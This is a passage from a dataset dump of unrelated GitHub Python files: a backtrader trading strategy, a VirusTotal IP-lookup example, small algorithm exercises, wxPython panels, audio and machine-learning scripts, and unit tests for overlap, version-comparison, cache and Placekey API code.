%.2f' % (order.executed.price, order.executed.value, order.executed.comm))\n\n self.bar_executed = len(self)\n\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\n self.log('Order Canceled/Margin/Rejected')\n\n self.order = None\n\n def notify_trade(self, trade):\n if not trade.isclosed:\n return\n\n self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f' % (trade.pnl, trade.pnlcomm))\n\n def next(self):\n # Simply log the closing price of the series from the reference\n self.log('Close, %.2f' % self.dataclose[0])\n\n # Check if an order is pending ... if yes, we cannot send a 2nd one\n if self.order:\n return\n\n # Check if we are in the market\n if not self.position:\n\n # 大于均线就买\n if self.dataclose[0] > self.sma[0]:\n\n # BUY, BUY, BUY!!! 
(with all possible default parameters)\n self.log('BUY CREATE, %.2f' % self.dataclose[0])\n\n # Keep track of the created order to avoid a 2nd order\n self.order = self.buy()\n\n else:\n\n if self.dataclose[0] < self.sma[0]:\n # 小于均线卖卖卖!\n self.log('SELL CREATE, %.2f' % self.dataclose[0])\n\n # Keep track of the created order to avoid a 2nd order\n self.order = self.sell()\n\n def stop(self):\n self.log('(MA Period %2d) Ending Value %.2f' % (self.params.maperiod, self.broker.getvalue()), doprint=True)\n\n\nif __name__ == '__main__':\n cerebro = bt.Cerebro()\n\n # 增加一个策略\n cerebro.addstrategy(TestStrategy, printlog=True, maperiod=14)\n\n # 增加多参数的策略\n # strats = cerebro.optstrategy(TestStrategy, maperiod=range(10, 31))\n\n #获取数据\n start_date = datetime(2021, 11, 3) # 回测开始时间\n end_date = datetime(2022, 11, 3) # 回测结束时间\n stock_hfq_df = pd.read_csv(\"./data/sh600000.csv\", index_col=\"datetime\", parse_dates=True, usecols=[\"datetime\", \"open\", \"high\", \"low\", \"close\", \"volume\"])\n stock_hfq_df = stock_hfq_df.iloc[::-1]\n data = bt.feeds.PandasData(dataname=stock_hfq_df, fromdate=start_date, todate=end_date) # 加载数据\n\n cerebro.adddata(data) # 将数据传入回测系统\n\n cerebro.broker.setcash(100000.0)\n # Set the commission - 0.1% ... divide by 100 to remove the %\n cerebro.broker.setcommission(commission=0)\n # Add a FixedSize sizer according to the stake 每次买卖的股数量\n cerebro.addsizer(bt.sizers.FixedSize, stake=100)\n\n print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())\n\n cerebro.run()\n\n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())\n\n cerebro.plot()","repo_name":"xiangxn/backtrader-example","sub_path":"five.py","file_name":"five.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"71920846248","text":"\"\"\"\nThe examples in this file are for virustotal-python version >=0.1.0\n\nRetrieve IP addresses using the VirusTotal API.\n\nDocumentation:\n\n * v3 documentation\n\n https://developers.virustotal.com/reference/ip-info\n https://developers.virustotal.com/reference/ip-object#relationships\n https://developers.virustotal.com/reference/ip-votes-post\n\n * v2 documentation - https://developers.virustotal.com/v2.0/reference/ip-address-report\n\"\"\"\nfrom virustotal_python import Virustotal\nfrom pprint import pprint\n\nAPI_KEY = \"\"\n\n# (Google DNS)\nIP = \"8.8.8.8\"\n\n# v3 examples\nvtotal = Virustotal(API_KEY=API_KEY)\n\n# Get information about an IP address\nresp = vtotal.request(f\"ip_addresses/{IP}\")\n# Get objects (relationships) related to an IP address\n# Get historical_whois relationship to the IP address\nresp = vtotal.request(f\"ip_addresses/{IP}/historical_whois\")\n# Get communicating_files related to the IP address with a limit of 5\nresp = vtotal.request(f\"ip_addresses/{IP}/communicating_files\", params={\"limit\": 5})\n\n# Get votes for an IP address\nresp = vtotal.request(f\"ip_addresses/{IP}/votes\")\n# Add a vote for an IP address\n# Verdict can be either harmless or malicious\nvote = {\"data\": {\"type\": \"vote\", \"attributes\": {\"verdict\": \"harmless\"}}}\nresp = vtotal.request(f\"ip_addresses/{IP}/votes\", json=vote, method=\"POST\")\n\n# v2 examples\nvtotal = Virustotal(API_KEY=API_KEY, API_VERSION=2)\n# Get information about an IP address\nresp = vtotal.request(\"ip-address/report\", params={\"ip\": 
IP})\npprint(resp.json())\n","repo_name":"dbrennand/virustotal-python","sub_path":"examples/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"40241626554","text":"import pytest\nfrom Adv_Dark_Deep.Char_Creation import roll_abilities\n\n\nclass Test3d6:\n def test_multiple_rolls(self):\n for i in range(25): # Run 25 tests (equals 150 rolls)\n rolls = roll_abilities.three_d6()\n for val in rolls:\n assert 3 <= val <= 18\n\n\nclass Test4d6:\n def test_multiple_rolls(self):\n for i in range(25):\n rolls = roll_abilities.four_d6_drop_lowest()\n for val in rolls:\n assert 3 <= val <= 18\n\n\nclass Test2d6:\n def test_multiple_rolls(self):\n for i in range(25):\n rolls = roll_abilities.two_d6_plus_6()\n for val in rolls:\n assert 3 <= val <= 18\n","repo_name":"crystalattice/Fantasy_RPG","sub_path":"Adv_Dark_Deep/tests/test_abilities_roll.py","file_name":"test_abilities_roll.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3614088913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: berrystruction\nThis implementation comes after reading the following online material:\n- https://www.youtube.com/watch?v=pRG1kh85zwI\n- https://applicature.com/blog/blockchain-technology/blockchain-code-examples\n- https://lhartikk.github.io/jekyll/update/2017/07/13/chapter2.html\n\"\"\"\n\nimport argparse\nimport hashlib\nfrom datetime import datetime\n\n# Argument parsing\nap = argparse.ArgumentParser();\nap.add_argument(\"n1\", default=15, help=\"Number of blocks to add to the chain\")\nargs = vars(ap.parse_args())\n\n\nclass Block:\n def __init__(self, index, timestamp, data, previous_hash):\n self.index = index\n self.timestamp = timestamp\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.hash_block()\n\n def hash_block(self):\n sha = hashlib.sha256()\n sha.update(str(self.index).encode('utf-8') +\n str(self.timestamp).encode('utf-8') +\n str(self.data).encode('utf-8') +\n str(self.previous_hash).encode('utf-8'))\n return sha.hexdigest()\n\n\ndef create_genesis_block():\n return Block(0, datetime.now(), \"Genesis Block\", \"0\")\n\ndef next_block(last_block):\n this_index = last_block.index + 1\n this_timestamp = datetime.now()\n this_data = \"Hey! 
I'm block \" + str(this_index)\n this_hash = last_block.hash\n return Block(this_index, this_timestamp, this_data, this_hash)\n\ndef main(num_of_blocks_to_add_str):\n print('MyBlockchain v1.1.0')\n print('---------------------------------')\n #print(num_of_blocks_to_add_str)\n\n num_of_blocks_to_add = int(num_of_blocks_to_add_str)\n blockchain = [create_genesis_block()]\n previous_block = blockchain[0]\n \n if num_of_blocks_to_add < 0: # num_of_blocks_to_add == '{}':\n # default value \n num_of_blocks_to_add = 1\n\n for i in range(0, num_of_blocks_to_add):\n block_to_add = next_block(previous_block)\n blockchain.append(block_to_add)\n previous_block = block_to_add\n # Tell everyone about it!\n print(\"Block #{} has been added to the blockchain!\".format(block_to_add.index))\n print(\"Hash: {}n\".format(block_to_add.hash))\n\nif __name__ == '__main__':\n main(args['n1'])","repo_name":"berrrystruction/simple_sample_blockchain","sub_path":"py_proj/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40446144607","text":"# *****************************************************\n#\n# Program Author: Frances Zhao\n# Completion Date: May 22 2021\n# Program Name: lesson21_5.py\n# Description: Create using loops. Write a procedure to output the pattern. In each case the procedure should have\n# one parameter which is the number of rows. Test your procedures with input from programmer and from\n# user.\n#\n# *****************************************************\nimport random\n\n\n# function to replace a with aa\ndef make_aa(word):\n new_word = str()\n for i in range(len(word)):\n if \"aA\".find(word[i]) != -1:\n new_word += word[i]+word[i]\n else:\n new_word += word[i]\n return new_word\n\n\n# function to replace letter b in a string with \"ac\"\ndef replace_b(word):\n new_word = str()\n for i in range(len(word)):\n if \"bB\".find(word[i]) != -1:\n new_word += \"ac\"\n else:\n new_word += word[i]\n return new_word\n\n\n# function to randomly insert the letter c in a string\ndef random_c(word):\n new_word = str()\n length = len(word)-1\n index = random.randint(0, length)\n for i in range(length+1):\n if i == index:\n new_word += \"c\"\n new_word +=word[i]\n return new_word\n\n\n# main program:\nfunctioncall = random.randint(1,10) # function calls = random\nfor i in range(functioncall):\n selection = [make_aa, replace_b, random_c]\n choices = random.choice(selection)\n word = input(\"Please enter a word!: \") # prompting user for a word\n while not (word.isalpha()):\n word = input(\"Please enter an alphabetical word: \")\n print(f\"your word put in a random function is: {choices(word)}.\") # using a random function and printing result\n","repo_name":"frances-zhao/ICS207","sub_path":"homework/lesson 21/lesson21_5.py","file_name":"lesson21_5.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28319756381","text":"routes = [[-20,15], [-14,-5], [-18,-13], [-5,-3]]\r\n\r\ndef solution(routes):\r\n routes = [[i[0], i[1]] for i in sorted(routes, key=lambda x: (x[0]))]\r\n # 배열 순서를 고속도로 진입 시점이 가장 빠른(-20) 지점부터 정렬\r\n result = [routes.pop(0)] # 0 번째 배열 pop\r\n\r\n print('routes :', routes)\r\n print('result :', result)\r\n\r\n for i in routes:\r\n idx = 0\r\n while idx != len(result):\r\n if (result)[idx][0] <= i[0] <= result[idx][1] or (result[idx][0] <= i[1] <= 
result[idx][1]):\r\n                result[idx][0] = i[0] if i[0] > result[idx][0] else result[idx][0]\r\n                result[idx][1] = i[1] if i[1] < result[idx][1] else result[idx][1]\r\n                # compare the popped result interval against the remaining routes, narrowing the range (e.g. from -20 down to -18)\r\n                break\r\n            else:\r\n                idx += 1\r\n        # if, while comparing, an interval falls outside every narrowed range,\r\n        # install a new surveillance camera to cover that range\r\n        if idx == len(result):\r\n            result.append(i)\r\n\r\n    return len(result)\r\n\r\nprint(solution(routes))\r\n\r\n","repo_name":"daehanchoi-dev/BOJ-BAEKJOONALGORITHM","sub_path":"단속카메라.py","file_name":"단속카메라.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7799467975","text":"import sys\n\nN,M = map(int, sys.stdin.readline().split(' '))\n\npos_cost = []\ncosts = [[float(\"inf\") for _ in range(N)] for _ in range(N) ]\ncostPresum = [0]\nfor i in range(N):\n    costs[i][i] = 0\n\ndef getCost(a,b):\n    return costPresum[-1]-(costPresum[b+1]-costPresum[a])\n\ndef calculToRight(a,b):\n    c = b+1\n    if c == N or costs[c][a] != float(\"inf\"):\n        return False\n    cost = getCost(a,b)\n    costs[c][a] = min(cost*(pos_cost[c][0]-pos_cost[a][0])+costs[a][b], cost*(pos_cost[c][0]-pos_cost[b][0])+costs[b][a])\n    return True\n\ndef calculToLeft(b,c):\n    a = b-1\n    if a == -1 or costs[a][c] != float(\"inf\"):\n        return False\n    cost = getCost(b,c)\n    costs[a][c] = min(cost*(pos_cost[c][0]-pos_cost[a][0])+costs[c][b], cost*(pos_cost[b][0]-pos_cost[a][0])+costs[b][c])\n    return True\n\nfor _ in range(N):\n    temp = tuple(map(int,sys.stdin.readline().split(' ')))\n    costPresum.append(costPresum[-1]+temp[1])\n    pos_cost.append(temp)\n    \nqueue = [(M-1,M-1)]\n\nwhile len(queue) != 0:\n    a,b = queue.pop(0)\n    if calculToLeft(a,b):\n        queue.append((a-1,b))\n    if calculToRight(a,b):\n        queue.append((a,b+1))\n    \nprint(min(costs[0][N-1],costs[N-1][0]))","repo_name":"LeeHanSeong7/AlgorithmLab","sub_path":"Baekjoon/problem/python/2315.py","file_name":"2315.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5293924014","text":"import wx\nfrom hyperreal.gui.Dialogues import error\nfrom wx.lib import wordwrap\n\n\nclass ImagePanel(wx.Panel):\n\n    def __init__(self, parent):\n        wx.Panel.__init__(self, parent, -1)\n        self.parent = parent\n\n        image = wx.Image(1, 1)\n        self.photo_max_size = 900\n        self.image_control = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(image))\n\n        self.image_control.Bind(wx.EVT_RIGHT_DOWN, parent.on_right_down)\n\n        sizer = wx.BoxSizer(wx.VERTICAL)\n        sizer.AddStretchSpacer()\n        sizer.Add(self.image_control, 0, wx.CENTER)\n        sizer.AddStretchSpacer()\n\n        self.SetSizer(sizer)\n\n    def load_image(self, filename):\n        try:\n            image = wx.Image(filename, wx.BITMAP_TYPE_ANY)\n            self.image_control.SetBitmap(wx.Bitmap(image))\n            self.parent.SetSize(image.GetWidth(), image.GetHeight() + 100)\n            self.Refresh()\n        except IOError:\n            error(self, \"Image file %s not found\" % filename)\n\n\nclass TextPanel(wx.Panel):\n\n    def __init__(self, parent):\n        wx.Panel.__init__(self, parent, -1)\n\n        self.text = wx.StaticText(self, label=\"empty\")\n        self.text.Bind(wx.EVT_RIGHT_DOWN, parent.on_right_down)\n\n        sizer = wx.BoxSizer(wx.VERTICAL)\n        sizer.Add(self.text)\n        self.SetSizer(sizer)\n\n    def load_text(self, text: str):\n        self.text.SetLabel(label=text)\n        
self.text.Wrap(1000)\n","repo_name":"wsrtka/Hyperreal","sub_path":"hyperreal/gui/Panels.py","file_name":"Panels.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28885783597","text":"import numpy as np\nimport scipy.io.wavfile\n\nLEN_CLIP = 10\nLEN_SILENCE = 0.25\nOUTPUT_LEVELS = 40\nRATE = 22050\n\n\ndef save_wav(data, filename, rate=RATE):\n scipy.io.wavfile.write(filename, rate, data)\n\n\ndef load_wav(filename):\n if isinstance(filename, list):\n data = []\n for f in filename:\n d, rate = load_wav(f)\n data.append(d)\n return np.concatenate(data, axis=0), rate\n rate, data = scipy.io.wavfile.read(filename)\n return data, rate\n\n\ndef find_latency(train_signal='chirp'):\n from train import BASE_DIR\n if train_signal == 'chirp':\n train_signal = BASE_DIR + 'train2.wav'\n train_label = BASE_DIR + 'train2_2204_212.wav'\n elif train_signal == 'noise':\n train_signal = BASE_DIR + 'train.wav'\n train_label = BASE_DIR + 'train_2204_212.wav'\n elif train_signal == 'validation':\n train_signal = BASE_DIR + 'validation.wav'\n train_label = BASE_DIR + 'validation_2204_212.wav'\n train_signal, _ = load_wav(train_signal)\n train_label, _ = load_wav(train_label)\n train_label = train_label[:train_signal.size]\n\n # def normalize(x):\n # x = x-np.mean(x)\n # x = x/np.std(x)\n # return x\n def normalize(x):\n x = np.sign(x).astype('float')\n return x\n train_label = normalize(train_label)\n train_signal = normalize(train_signal)\n\n max_shift = int(RATE*3*1e-3)\n shifts = np.arange(0, max_shift)\n mses = [np.mean(np.square(train_signal-train_label)) if shift == 0\n else np.mean(np.square(train_signal[shift:]-train_label[:-shift]))\n for shift in shifts]\n print(mses)\n print(np.mean(np.square(train_label)))\n print(shifts[np.argmin(mses)])\n\n\ndef generate_noise(length, std=0.1):\n return np.random.normal(loc=0., scale=std, size=[length])\n\n\ndef generate_chirp(length, f_start, f_end, harmonic_ratio):\n n_harmonics = int(np.floor(np.log2(RATE/2/max([f_start, f_end]))))\n if max([f_start, f_end])*2**n_harmonics >= RATE/2:\n raise ValueError('Cannot have %i harmonics. 
Highest frequency is above the Nyquist rate' % n_harmonics)\n t = np.linspace(0, length, int(length*RATE))\n f = np.linspace(f_start, f_end, int(length*RATE), endpoint=True)\n signal = np.zeros(int(length*RATE), dtype='float')\n for h in range(n_harmonics):\n fh = f*2**h\n signal += (harmonic_ratio**h)*np.sin(2*np.pi*fh*t)\n return signal\n\n\ndef generate_train_signal(saveto):\n \"\"\"\n generate segments of length LEN_CLIP seconds with LEN_SILENCE second of silence at the end of each\n\n :param saveto: path to save training wav file\n :return:\n \"\"\"\n length = int((LEN_CLIP-LEN_SILENCE)*RATE)\n signal = []\n for std in np.logspace(-3.5, -1, OUTPUT_LEVELS, endpoint=True):\n signal.append(generate_noise(length, std=std))\n signal.append(np.zeros([int(RATE*LEN_SILENCE)]))\n signal = np.concatenate(signal)\n save_wav(signal, saveto, RATE)\n\n\ndef generate_train_signal2(saveto):\n signal = []\n f_low = 40 # bass low E\n f_high = 80*8 # twelfth fret high E\n for harmonic_ratio in [0.1*i for i in range(10)]:\n chirp = generate_chirp(LEN_CLIP - LEN_SILENCE, f_low, f_high, harmonic_ratio)\n for i, std in enumerate(np.logspace(-3.5, -0.6, OUTPUT_LEVELS, endpoint=True)):\n x = np.sqrt(2)*std*chirp\n signal.append(x)\n signal.append(np.zeros([int(RATE*LEN_SILENCE)]))\n signal = np.concatenate(signal)\n save_wav(signal, saveto, RATE)\n\n\ndef split_signal(data):\n # split_length = 96000 # this appears to be the limit for laptop cpu training\n split_length = int(np.ceil(data.size/(data.size//1e5)))\n if data.size % split_length != 0:\n data = np.concatenate([data, np.zeros(split_length-(data.size % split_length), dtype=data.dtype)], axis=0)\n data = np.array(np.split(data, np.ceil(data.size/split_length)))\n data = np.expand_dims(data, axis=1)\n return data\n # data = np.expand_dims(np.expand_dims(data, axis=0), axis=0)\n # return data\n\n\ndef clear_print(string='', end=''):\n clear = '\\x1b[2K\\r'\n print(clear+string, end=end)\n","repo_name":"jrbtaylor/ampclone","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36676717553","text":"from xgboost import XGBRegressor\nfrom sklearn.datasets import load_diabetes\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.metrics import r2_score\nimport numpy as np\n\nx, y = load_diabetes(return_X_y=True)\n# print(x.shape, y.shape) # (506, 13) (506,)\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=21)\n'''\nparameter = [\n {'gamma': [0,10,100,1000], 'max_depth': [2,4,6,8,10]},\n]\n\nmodel = XGBRegressor()\nrandom = RandomizedSearchCV(model, parameter, verbose=1)\nrandom.fit(x_train, y_train)\n\nbest_estimator = random.best_estimator_\nbest_score = random.best_score_\n# print('best parameter = ', best_estimator)\n# print('best score = ', best_score)\n'''\nfrom sklearn.feature_selection import SelectFromModel\n\nmodel = XGBRegressor(\n base_score=0.5, booster='gbtree', colsample_bylevel=1,\n colsample_bynode=1, colsample_bytree=1, gamma=1000, gpu_id=-1,\n importance_type='gain', interaction_constraints='', \n learning_rate=0.300000012, max_delta_step=0, max_depth=8, \n min_child_weight=1, monotone_constraints='()',\n n_estimators=100, n_jobs=8, num_parallel_tree=1, random_state=0,\n reg_alpha=0, reg_lambda=1, scale_pos_weight=1, subsample=1,\n tree_method='exact', validate_parameters=1, 
verbosity=None\n)\nmodel.fit(x_train, y_train)\n\nthreshold = np.sort(model.feature_importances_)\nfor thresh in threshold:\n    # print(thresh)\n    \n    selection = SelectFromModel(model, threshold=thresh, prefit=True)\n    # print(selection)\n    \n    select_x_train = selection.transform(x_train)\n    select_x_test = selection.transform(x_test)\n    # print(select_x_train.shape, select_x_test.shape)\n\n    selection_model = XGBRegressor(\n        base_score=0.5, booster='gbtree', colsample_bylevel=1,\n        colsample_bynode=1, colsample_bytree=1, gamma=1000, gpu_id=-1,\n        importance_type='gain', interaction_constraints='', \n        learning_rate=0.300000012, max_delta_step=0, max_depth=8, \n        min_child_weight=1, monotone_constraints='()',\n        n_estimators=100, n_jobs=8, num_parallel_tree=1, random_state=0,\n        reg_alpha=0, reg_lambda=1, scale_pos_weight=1, subsample=1,\n        tree_method='exact', validate_parameters=1, verbosity=None\n    )\n    selection_model.fit(select_x_train, y_train)\n\n    y_pred = selection_model.predict(select_x_test)\n\n    score1 = r2_score(y_test, y_pred)\n    score2 = selection_model.score(select_x_test, y_test)\n\n    print('Thresh=%.3f, n=%d, r2=%.2f%%' % (thresh, select_x_train.shape[1], \n                                    score1*100))\n\n\n\n\n","repo_name":"MinseokCHAE/Bitcamp3","sub_path":"ml/ml25_selectfrommodel.py","file_name":"ml25_selectfrommodel.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19549145982","text":"def first(n,array1):\r\n    a = dict()\r\n    count = 1\r\n    for i in array1:\r\n        if i not in a:\r\n            a[i] = count\r\n        else:\r\n            a[i] = a[i]+count\r\n    bigcount = None\r\n    bigword = None\r\n    for w,c in a.items():\r\n        if bigcount is None or c > bigcount:\r\n            bigword = w\r\n            bigcount = c\r\n    print(bigword)\r\nfirst(int(input()),input().split(' '))","repo_name":"MagiMagesh/Guvi-Codekata","sub_path":"Guvi Codekata/array-70.py","file_name":"array-70.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37403837960","text":"from srcnn import SRCNN\nimport torch\nimport cv2\nimport matplotlib.pyplot as plt\n\nfig = plt.figure(figsize=(40, 20))\nax1 = plt.subplot(121)\nax2 = plt.subplot(122)\nnet = SRCNN(num_channel=3)\n\nimage = torch.tensor(cv2.imread(\"./test.jpg\", cv2.IMREAD_UNCHANGED)).permute(2,0,1) /255.\nimage = image.view(1, *image.size())\n\nnet.load_state_dict(torch.load('srcnn_saved.pth'))\n\ny = net(image)\n\nax1.imshow(image[0, 0, ...])\nax2.imshow(y[0,0,...].detach().numpy())\nplt.show()","repo_name":"PICOPON/FRSR","sub_path":"SRCNN/srcnn_detect.py","file_name":"srcnn_detect.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8015633731","text":"# default file imports.\nfrom overlap import check_overlap\nfrom version_check import check_version\nfrom cache import Cache\nimport random\n\ndef overlap_test():\n    \"\"\"\n    Test case for question A:\n\n    Your goal for this question is to write a program that accepts two lines (x1,x2) and (x3,x4) on the\n    x-axis and returns whether they overlap. 
As an example, (1,5) and (2,6) overlaps but not (1,5)\n and (6,8).\n\n :return:\n \"\"\"\n success = True\n\n if check_overlap(1, 2, 3, 4):\n success = False\n print('expected ' + str(False) +' but got ' + str((check_overlap(1, 2, 3, 4))))\n if not check_overlap(1, 3, 2, 4):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(1, 3, 2, 4))))\n if check_overlap(3, 4, 1, 2):\n success = False\n print('expected ' + str(False) +' but got ' + str((check_overlap(3, 4, 1, 2))))\n if not check_overlap(2, 4, 1, 3):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(2, 4, 1, 3))))\n if not check_overlap(2, 3, 1, 4):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(2, 3, 1, 4))))\n if not check_overlap(1, 4, 2, 3):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(1, 4, 2, 3))))\n if not check_overlap(1, 3, 1, 2):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(1, 3, 1, 2))))\n if not check_overlap(1, 4, 2, 4):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(1, 4, 2, 4))))\n\n if success:\n print('All overlapping tests successfully performed.\\n')\n else:\n print('All overlapping tests performed. (With errors)\\n')\n\n\ndef version_test():\n \"\"\"\n Test case for question B:\n\n The goal of this question is to write a software library that accepts 2 version string as input and\n returns whether one is greater than, equal, or less than the other. As an example: “1.2” is\n greater than “1.1”. Please provide all test cases you could think of.\n\n :return:\n \"\"\"\n success = True\n\n if check_version('1', '2') != -1:\n success = False\n print(check_version('1', '2'))\n if check_version('1.1', '1.2') != -1:\n success = False\n print(check_version('1.1', '1.2'))\n if check_version('1.3', '1.3.1') != -1:\n success = False\n print(check_version('1.3', '1.3.1'))\n if check_version('1.4', '1.3.12') != 1:\n success = False\n print(check_version('1.4', '1.3.12'))\n if check_version('3.1.1', '3.1.10') != -1:\n success = False\n print(check_version('3.1.1', '3.1.10'))\n if check_version('3.1.1.4321', '3.1.1.4321') != 0:\n success = False\n print(check_version('3.1.1.4321', '3.1.1.4321'))\n if check_version('2', '1') != 1:\n success = False\n print(check_version('2', '1'))\n if check_version('4.2', '1.2') != 1:\n success = False\n print(check_version('4.2', '1.2'))\n if check_version('1.1', '2') != -1:\n success = False\n print(check_version('1.1', '2'))\n if check_version('3.1.3', '3.1.3') != 0:\n success = False\n print(check_version('3.1.3', '3.1.3'))\n if check_version('1', '1.1.12.4444') != -1:\n success = False\n print(check_version('1', '1.1.12.4444'))\n\n if success:\n print('All version tests successfully performed.\\n')\n else:\n print('All version tests performed. 
(With errors)\\n')\n\n\ndef cache_test():\n \"\"\"\n TEST CASE FOR CACHE SYSTEM.\n\n :return:\n \"\"\"\n # Test the cache\n Keys = [i for i in range(random.randint(1,10))] # Total Entries\n place = [\n 'Imalia', 'Brazil', 'Canada', 'Zimbabawe',\n 'Saturn?', 'New Zealand', 'São Paulo', 'Dubai',\n 'Mars?', 'Singapore', 'Los Angeles', 'Santos',\n 'São Tomé', 'Luxemburg', 'New Deli', 'Abu Dhabi',\n 'São Vicente',\n ]\n\n # Cache object\n cache = Cache()\n\n # Updating Cache with entries\n for i, key in enumerate(Keys):\n if key in cache:\n continue\n else:\n value = ''.join([random.choice(place)])\n print('\\t', value)\n cache.update(key, value)\n\n print(\"{0}.Iteration, #{1} cached entries\".format(i + 1, cache.size()))\n\n # Cache List\n print('\\n\\n\\t', '*' * 10, ' Places List ', '*' * 10)\n for k, v in cache.view().items():\n print(\"{0} : {1}\".format(k, v))\n\n print(\"Cache size: \", cache.size())\n\n print(\"Cache overview: \", cache.view())\n\n print(\"delete the oldest item from cache: \", cache.delete())\n\n print(\"Erasing the cache: \", cache.empty())\n\n # end of the test\n print('_' * 60)\n\nprint('_' * 30)\nprint('Test for Question A: Overlapping lines')\noverlap_test()\n\n\nprint('_' * 30)\nprint('Test for Question B: Version check')\nversion_test()\n\n\nprint('_' * 30)\nprint('Test for Question C: Cache System?')\ncache_test()\n","repo_name":"Messhias/ormuco-test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31029229286","text":"\"\"\"\nPlacekey API client tests.\n\nTo exclude slow tests run `pytest -m\"not slow\" placekey/tests/test_api.py`.\n\"\"\"\n\nimport os\nimport unittest\nimport pytest\nimport random\nfrom placekey.api import PlacekeyAPI\n\n\nclass TestAPI(unittest.TestCase):\n \"\"\"\n Tests for api.py\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.api_key = os.getenv('PLACEKEY_API_KEY')\n\n def setUp(self):\n if not self.api_key:\n self.fail('The PLACEKEY_API_KEY environment variable must be set to run tests.')\n\n self.pk_api = PlacekeyAPI(\n api_key=self.api_key, user_agent_comment=\"placekey-py-tests\")\n\n def test_lookup_placekey(self):\n \"\"\"\n test lookup_placekey\n \"\"\"\n # A lat/long query\n self.assertDictEqual(\n self.pk_api.lookup_placekey(latitude=37.7371, longitude=-122.44283),\n {'query_id': '0', 'placekey': '@5vg-82n-kzz'}\n )\n\n # An address query\n place = {\n \"street_address\": \"598 Portola Dr\",\n \"city\": \"San Francisco\",\n \"region\": \"CA\",\n \"postal_code\": \"94131\",\n \"iso_country_code\": \"US\"\n }\n self.assertDictEqual(\n self.pk_api.lookup_placekey(**place, strict_address_match=True),\n {'query_id': '0', 'placekey': '227@5vg-82n-pgk'}\n )\n\n # An invalid query\n bad_place = {\n \"street_address\": \"598 Portola Dr\",\n \"city\": \"San Francisco\",\n \"region\": \"CA\",\n \"postal_code\": \"94131\",\n \"iso_country_code\": \"US\",\n \"something\": \"foo\"\n }\n self.assertFalse(\n self.pk_api._validate_query(bad_place)\n )\n\n def test_lookup_placekeys(self):\n \"\"\"\n Test lookup_placekeys\n\n This test also covers lookup_batch, as lookup_placekeys is a wrapper\n for that function.\n \"\"\"\n places = [\n {\n \"street_address\": \"1543 Mission Street, Floor 3\",\n \"city\": \"San Francisco\",\n \"region\": \"CA\",\n \"postal_code\": \"94105\",\n \"iso_country_code\": \"US\"\n },\n {\n \"query_id\": \"thisqueryidaloneiscustom\",\n \"location_name\": \"Twin Peaks 
Petroleum\",\n \"street_address\": \"598 Portola Dr\",\n \"city\": \"San Francisco\",\n \"region\": \"CA\",\n \"postal_code\": \"94131\",\n \"iso_country_code\": \"US\"\n },\n {\n \"latitude\": 37.7371,\n \"longitude\": -122.44283\n }\n ]\n self.assertListEqual(\n self.pk_api.lookup_placekeys(places),\n [\n {'query_id': 'place_0', 'placekey': '226@5vg-7gq-5mk'},\n {'query_id': 'thisqueryidaloneiscustom', 'placekey': '227-222@5vg-82n-pgk'},\n {'query_id': 'place_2', 'placekey': '@5vg-82n-kzz'}\n ]\n )\n\n @pytest.mark.slow\n def test_lookup_placekeys_slow(self):\n \"\"\"\n Longer running rate-limit test for lookup_placekeys. This should run and\n get a valid result for each item queried.\n \"\"\"\n random.seed(1)\n num_samples = 10000\n lat_long_samples = [\n {'latitude': random.uniform(-90.0, 90.0), 'longitude': random.uniform(0.0, 180.0)}\n for _ in range(num_samples)\n ]\n results = self.pk_api.lookup_placekeys(lat_long_samples)\n self.assertEqual(len(results), num_samples)\n self.assertTrue(all(['placekey' in r for r in 